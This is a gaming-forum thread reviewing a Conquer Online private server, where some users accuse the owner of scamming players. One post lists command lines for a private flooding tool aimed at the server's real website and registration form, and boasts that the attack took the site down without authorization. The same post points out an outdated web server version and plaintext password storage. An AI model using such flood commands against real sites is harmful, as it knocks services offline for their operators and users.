Register for your free account! | Forgot your password?

You last visited: Today at 18:03

• Please register to post and access all features, it's quick, easy and FREE!

Advertisement

Sensation Conquer Classic 1.0

Discussion on Sensation Conquer Classic 1.0 within the CO2 PServer Archive forum part of the CO2 PServer Advertising category.

Closed Thread

Old 12/04/2017, 15:19   #16

elite*gold: 0
Quote:
Originally Posted by mohamedmoezz555 View Post
In my opinion tried it
and what you think ?
Old 01/20/2018, 04:51   #17

elite*gold: 0
Lol trash server. Owner just milking $ from people everytime. He opens the server then closes it a few months. then opens and closes again.

Check his conversation to one of his players . he is selling them gears for 200$ *****.

Old 01/20/2018, 05:50   #18

elite*gold: 12
Received Thanks: 4,114
Not sure how that website went under my radar of shitty design, but huh. Lists that don't new line properly, a logo that isn't transparent, links that aren't actually hyperlinks, important text behind other text and images, text that falls off the nav buttons, a live server status script that likely touches the server each time it updates, and a god awful registration website which just screams "we got scammed" since it's the same tripe as the other copy servers.

But, hey, that's just design. It's subjective, and you might still be thinking "well, it's what's underneath the shit that counts, right?" Well, it turns out that it's just more shit. My flooding test tool () actually takes the site down. It takes a bit to start up, but it's effective. It's much more effective at the registration page. Even with just 10 routines it gets slammed.
Code:
x -t http://sensationconquer.com -r 5000
x -t http://sensationconquer.com:52736/Register.aspx -r 5000
x -t http://sensationconquer.com:52736/Register.aspx -r 10 -a post ctl00$body$Account deadpool ctl00$body$Password deadpool ctl00$body$PasswordRetype deadpool ctl00$body$Email deadpool ctl00$body$EmailRetype deadpool ctl00$body$SecurityQuestion 13

In addition, you might as well be throwing your password away. You can recover your password... you shouldn't be able to recover your password from anything. You shouldn't be saving the plain text passwords for all your players! That's called a phishing scheme.

And on the topic of security: "Apache/2.2.8 (Win32) PHP/5.2.6"
That's 10 year old web hosting software. Can't wait for this site to get crawled and infected, and start DDoSing other websites and infecting users. How dense do you have to be... to use internet software from 10 years ago? That's unbelievable.

And you know this is the same scammed software bundle of shit that's been going around. The same website, same version numbers, everything. Get out of here, 1 star. If this server is anything like your status.php's keep-alive, then it won't be around for long.
Thanks
1 User
Old 02/06/2018, 19:00   #19

elite*gold: 350
Received Thanks: 1,184
what happened to not ddosing/flooding other servers?
what a hypocrite
Old 02/06/2018, 20:49   #20

elite*gold: 12
Received Thanks: 4,114
Quote:
Originally Posted by B1Q View Post
what happened to not ddosing/flooding other servers?
what a hypocrite
That tool only exposes MASSIVE performance / security issues with a website (aka. HTTP only). It's not a Conquer server DDoS tool. I made it to encourage good development practices, not bring down a server. Plus, I don't feel bad for taking their website down for 5 seconds to show off how awful they are. People making servers to exploit others don't get my sympathy. Seeing you're an SRO server owner, I'd be surprised if someone was using this tool for any other purpose (the tool is private now anyways since I plan to replace it with an automation/performance toolkit).
Old 02/09/2018, 15:07   #21

elite*gold: 1
The Black Market: 416/0/0
Received Thanks: 3,205
#closed (server offline)
Closed Thread